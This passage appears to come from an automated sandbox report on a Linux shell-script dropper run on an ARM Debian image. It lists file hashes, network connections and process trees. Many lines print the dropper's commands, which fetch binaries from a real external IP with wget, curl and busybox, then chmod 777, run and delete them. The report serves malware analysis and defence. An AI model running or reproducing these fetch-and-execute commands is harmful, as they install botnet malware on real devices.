[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s

[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/rm

[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.193.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 02:06

Reported

2024-11-24 02:09

Platform

debian9-armhf-20240611-en

Max time kernel

71s

Max time network

76s

Command Line

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A

Processes

/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s

[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/rm

[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/chmod

[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4

[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/rm

[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

